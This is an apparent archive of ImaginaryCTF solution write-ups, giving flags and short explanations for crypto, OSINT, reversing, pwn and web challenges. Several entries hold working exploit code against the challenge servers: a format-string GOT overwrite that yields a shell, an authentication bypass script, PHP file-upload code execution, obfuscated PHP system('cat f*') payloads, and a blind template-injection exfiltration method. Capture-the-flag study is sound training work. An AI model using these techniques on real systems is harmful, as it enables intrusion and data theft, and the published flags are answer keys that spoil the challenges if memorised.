Archived Challenges - October 2021

The flag is the filename

ictf{imagine_not_being_able_to_guess_the_round_15_flag}

https://en.wikipedia.org/wiki/Acrostic The first letter of each line makes the flag.

ictf{ThisIsAChallengeCauseIAmBored}

Clone our github repository:

git clone https://github.com/Et3rnos/ImaginaryCTF

And search the git log for password

git log --all --full-history -p -- | grep password

If you now what you are doing you can do:

git log --all --full-history -p -- **/appsettings.json | grep password=

in order to filter only the results in appsettings.json files

ictf{nzH82LdJ4jbjYNS2X8FmdzsXqDQC9y3U}

Solve script at: https://imaginaryctf.org/f/VXlBU

ictf{FD9BBGUtL3JwZXb7EF54k7c4u3H5GcMG}

The cyberchef recipe "From Base64" then "Remove Diacritics" will yield the flag.

ictf{3very_+!m3_50m30n3_tr13s_2_p@r5e_hTmL_w1+h_r3g3x_@l1_y0u_g3t_15_r3gr3+5}

spamm >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

https://github.com/Alic3C/Cyber-FastTrack-Spring-2021/tree/main/Binary/BX01

ictf{sourceless_binaryless_pwn_lul}

The scanner doesn't append a null character at the end of the string, so we can write 32 a's to the buffer and then puts will print the buffer along with the flag.

ictf{n0w_d0_17_w17h0u7_637ch4r}

The challenge does a decent job of explaining it. We want to write the address of win (0x401152) to the location of puts in the GOT (0x404018). Thus we can send the numbers 4210712 and 4198738 to get a shell, and thus the flag.

ictf{n1ce_g0t_0verwr1te_4923b021}

Get leak with first format string, and change puts to system in second format string.

from pwn import *

context.binary = elf = ELF("./bored")
libc = ELF("./libc-2.31.so")
conn = process("./bored")

conn.recvline()
conn.sendline(b"%7$saaaa" + p64(elf.got["puts"]))
libc.address = u64(conn.recv(6) + b"\x00\x00") - libc.symbols["puts"]
info("libc at " + hex(libc.address))

conn.sendline(fmtstr_payload(6, writes={elf.got["puts"]: libc.symbols["system"]}))
conn.recv()

conn.interactive()```

ictf{Theres_a_dormouse_on_my_doorstep_I_am_going_back_to_bed}

nc -u 13.90.75.65 7331

ictf{nc_-u_t0_c0nn3ct_v1a_udp!}

openssl rsautl -decrypt -in enc.txt -inkey private.pem -out flag.txt && cat flag.txt

ictf{Rivest–Shamir–Adleman-encryption-means-nothing-if-you-have-the-private-key}

You need to calculate phi, which is equal to (p-1)*(q-1), or p*q - p - q + 1, which can be trivially calculated from the provided numbers.

from Crypto.Util.number import *

pq = long_number_redacted
n = long_number_redacted
c = long_number_redacted
e = 65537
phi = n - pq + 1

d = pow(e, -1, phi)
pt = pow(c, d, n)
print(long_to_bytes(pt))```

ictf{3u13r_wuz_@_5m@r+_dud3}

Now, p and q are the same. You can take the square root of n with isqrt, or sage, or a binary search, then calculate phi as p(p-1). From there, you can find d = pow(e, -1 phi) and the message is pow(c, d, n).

ictf{totients_are_magic_things}

We can "hack" the server by sending the character 0x7f to it. This gives us the admin hash, and the python bytecode for the hash function. From this, we can see that the hash function is just SHA3 with a random salt that changes each connection.

From here, we can attempt to authenticate as admin. We'll be asked to compute hash(hash(password) + salt), which we can do because we already know hash(password). This then gives us the flag.

from pwn import *
from hashlib import sha3_256

hash_salt = ''
LOCAL = 0

def get_new_process():
    if LOCAL:
        return process(["python3.9", "server.py"])
    else:
        return remote("puzzler7.imaginaryctf.org", 7331)

def hsh(s):
    return sha3_256((s+hash_salt).encode()).hexdigest()

p = get_new_process()
p.recvuntil('>>> ')
p.sendline(b'\x7f')
p.recvuntil('admin: ')
admin_hash = p.recvline().decode().strip()
p.recvuntil("'")
hash_salt = p.recv(32).decode()
p.sendline()

p.sendline('1')
p.sendline('admin')
p.recvuntil("+ '")
salt = p.recv(32).decode()
pwd = hsh(admin_hash+salt)
p.sendline(pwd)
p.recvuntil('>>> ')
p.sendline('3')
print(p.recvall())

ictf{sometimes_the_hash_is_just_as_v@luable_as_the_password!}

This is El Gamal encryption, but addition and multiplication are used, instead of multiplication and exponentiation. A little bit of modular arithmetic will recover the flag.

from Crypto.Util.number import *

exec(open("output.txt").read())

mod = 2**128

geninv = pow(gen, -1, mod)
s = apub*bpub*geninv % mod
sinv = pow(s, -1, mod)
m = ct*sinv % mod

print(long_to_bytes(m))```

ictf{JustSumArthmetic}

simple affine cipher

ictf{my_gift_to_you_is_this_:_yet_another_easy_chall}

Approximate p/(48763q-r) with k and continued fractions, and factor q and r by solving a quadratic equation (x-48763q)(x+r)=x^2-(48763q-r)x-48763qr.

Sage solve script:

from decimal import *
from Crypto.Util.number import *

getcontext().prec = int(320)

with open("output.txt") as f:
    exec(f.read())


def approx(ab: Decimal):
    t = 10 ^ (len(str(ab)) - 2)
    r = ZZ(int(ab * int(t))) / t
    for c in continued_fraction(r).convergents():
        a = c.numer()
        b = c.denom()
        if a == 0 or b == 0:
            continue
        yield a, b


def solve(a, b, c):
    D = b ^ 2 - 4 * a * c
    if is_square(D):
        return (-b + sqrt(D)) // (2 * a), (-b - sqrt(D)) // (2 * a)


e = 65537

for p, qmr in approx(k):
    if p != 1 and n % p == 0:
        qr = n // p
        # (x-48763q)(x+r)=x^2-(48763q-r)x-48763qr
        q, r = solve(1, -qmr, -48763 * qr)
        q //= 48763
        r *= -1
        print(p, q, r)
        assert p * q * r == n
        phi = (p - 1) * (q - 1) * (r - 1)
        d = inverse(e, phi)
        m = power_mod(c, d, n)
        assert power_mod(m, e, n) == c
        print(long_to_bytes(m))```

ictf{approximating_and_solving_equations}

1. find a commit by repuzzler7
2. click on it
3. add .patch to the end of the commit url (the commit url should look something like this: github.com/username/repo/commit/hash) and the final patch url is: https://github.com/repuzzler7/Ciphey/commit/290bc017c6aa5d3b5d23a548fded54f39d14cbfb.patch
4. find repuzzler7's email address near the top of the page: From: repuzzler7 t0T4lLy_r341_v3rY_0fFIcla1@repuzzler7.com

ictf{t0T4lLy_r341_v3rY_0fFIcla1@repuzzler7.com}

These are the coordinates to the Giant Pink Bunny sculpture. One review has the flag: https://goo.gl/maps/8CVBqHojYnstB4g66

ictf{hopper_said_its_life_was_meaningful}

Using pwntools (https://docs.pwntools.com/en/stable/) you can do the math very quickly and easily.

from pwn import *

r = remote("puzzler7.imaginaryctf.org", 2222)

r.recvline()
for i in range(100):
    r.sendline(str(eval(r.recvline())))
r.interactive()```

ictf{Bu1lDin6_my_PWN_h0u5e}

Using pwntools (https://docs.pwntools.com/en/stable/) you can do the math very quickly and easily.

from pwn import *
r = remote("puzzler7.imaginaryctf.org", 2500)
r.recvline()
for i in range(100):
    r.sendline(str(eval(r.recvline())))
r.interactive()```

ictf{my_sincer3st_apologies_f0r_the_technical_issues}

The .git folder is exposed, meaning you can download and recreate the entire git repo. You can then look at the commits, and go back to the one that still has the flag.

wget -r http://puzzler7.imaginaryctf.org:1337/.git
cd puzzler7.imaginaryctf.org\:1337
git stash
git checkout 526855ad69f194cb1b223b339dc80277f6059bf9
cat flag.txt

ictf{with_.git_the_timeline_can_be_anything_you_want_it_to_be}

You can upload arbitrary php files and run them, such as the following, which lists all files in the directory, showing that the flag is at http://puzzler7.imaginaryctf.org:4000/thisisaverylongnamefortheflagfilethatyoullneverguessmuahahaha.txt

<?php
print_r(scandir('.'));
?>```

ictf{php_is_a_gross_and_icky_language_and_I_don't_want_to_write_any_more_of_it}

In order to bypass the regular expression, we can use the bitwise NOT operator (~) on the function we want to use (in this case, “system”) and the arguments that we pass (in this case, “cat f*”), which inverts each bit. Since this returns bytes that aren’t characters, we can URL encode them so that we are able to pass them to the “escape” argument. Finally, when we send the payload, we send both the function name and the arguments with the NOT operator to revert them back to the original strings. We also use PHP's dynamic function calls, which allow us to call a function by putting its name as a string inside a set of parentheses, and its arguments in another set of parentheses.

I've found two solutions using this method, namely system("cat f*") and show_source("f.php"). The URLs are below.

http://puzzler7.imaginaryctf.org:5000/?escape=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%99%D5); http://puzzler7.imaginaryctf.org:5000/?escape=(~%8C%97%90%88%A0%8C%90%8A%8D%9C%9A)(~%99%D1%8F%97%8F);

ictf{why_d0eS_3veRy0n3_h4t3_php}

You can input a template that will read the flag file, then compare it against a given string, sleeping for a second if the comparison is true. Thus, you can exfiltrate the flag, much like a blind sql attack (code in file below).

https://imaginaryctf.org/f/2tMPf

It's also possible to add a route to the Flask by getting access to the app object (credit to TBG):

for my local testing instance; but essentially this. the endpoint has to be unique for each route (afaict at least, because it compares function names and they're all called <lambda>) the /endpoint would be the url you could access the stuff in the end, the stuff after the lambda can be whatever you want essentially```

ictf{I_really_hope_that_this_doesn't_k1ll_my_server}

There's several hints to wireshark here, as well as the fact that the program won't run when not connected to the internet. Using wireshark to capture the packets that are sent when you login, you can see the flag sent in plaintext.

Wireshark will capture a lot of packets just from traffic from other processes, so it may be hard to find the right packet. This can be mitigated by 1) filtering traffic to my server only (puzzler7.imaginaryctf.org, or 67.159.89.33) and 2) stopping the capture immediately after logging in.

Alternatively, you could just run sudo tcpdump -A | grep ictf in another terminal, then login.

ictf{this_is_what_happens_when_you_give_espresso_to_a_great_white}

This is very similar to my previous reversing challenge Keycode (https://imaginaryctf.org/ArchivedChallenges/18). The flag is xored with the binary assembly of the all function. The only difference is that it's recursively checked, until the end of the flag is reached.

ictf{this_is_all_that_there_is}

This is simply a linked list, where out represents memory, and sections of 2 list elements are malloc'd. The first element is the data, and the second is the pointer to the index of the next element. The following code traverses the linked list and gets all the data.

#!/usr/bin/env python3

ct = [long_list_redacted]

flag = ''

curr = 0

while ct[curr] != 0:
    flag += chr(ct[curr])
    curr = ct[curr+1]
print(flag)```

ictf{this_was_how_the_flag_was_encoded_in_the_second_icicle_challenge_btw}

This is a simple LFSR circuit, where the next bit is the xor of all the even bits less than index 250. Backgenerating numbers from the provided hex on line 23 will yield the flag.

from Crypto.Util.number import *

def forward(n):
    new = 0
    for i in range(0, 250):
        if not i&1:
            new ^= (n>>i)&1
    return (new<<255)+(n>>1)

def backward(n):
    old = n>>255
    n <<= 1
    n %= 2**256
    for i in range(0, 250):
        if not i&1:
            old ^= (n>>i)&1
    return n + old

start = 0x98cb7f18bb2e8f0fdc857d6bac4878f4be43b6c4ac87ad212e3e1566929736c0

for i in range(500*256):
    start = backward(start)
    b = long_to_bytes(start)
    if b'ictf{' in b and b'}' in b:
        print(b)
        break
    if i%(256*5) == 0:
        print(f'{i//(256*5)}%')```

ictf{I_hop3_I_get_g00d_feedback}

Running this will yield a message that the magic number is wrong. Bruteforcing the magic numbers or manually decompiling the script will work.

ictf{I_hope_this_one_wasn't_too_gue55y...}

You can notice that the output is driven by the t wires, which are driven by the r wires, which are driven by the o wires, which are driven by the inputs. Specifically, each r wire is driven by 8 sequential inputs (i.e. bytes). Extracting these bytes yields the flag.

No solve script because I'm lazy and tired.

ictf{<_complicatd_than_it_seems}

There's a trivial OOB write in the dynamic string. However, simply trying to write a large number of bytes to it won't reach the password, because as it gets larger, it moves away from the password. Additionally, there's the pattern chunk in the way, creating a further distance.

When you realloc a chunk, it will expand if there is space. If there isn't space, realloc essentially just mallocs a new chunk, then frees the old chunk, leaving a gap. The idea is to use the initial pattern chunk to make gaps for the dynamic string to fill when it gets realloc'd, keeping it from moving away.

First, you can prevent the strdup from taking space on the heap by starting all inputs with \x00. Then, the only things in memory are the pattern chunk and the dynstr chunk. By growing the lower of the two just large enough for it to become the higher one, you can keep the dynstr from moving too far away. This will only work for some initial sizes of the pattern chunk (16, the minimum, is one of these). I wrote a program to brute force these initial conditions to find valid ones, as well as to print out the values I need to match along the way. This script, as well as my actual solve script, are below.

https://imaginaryctf.org/f/JxJTl#heapsim.py https://imaginaryctf.org/f/QPvlZ#x.py

ictf{I_hope_you_enjoyed_you_are_truly_the_master_of_feng_shui!}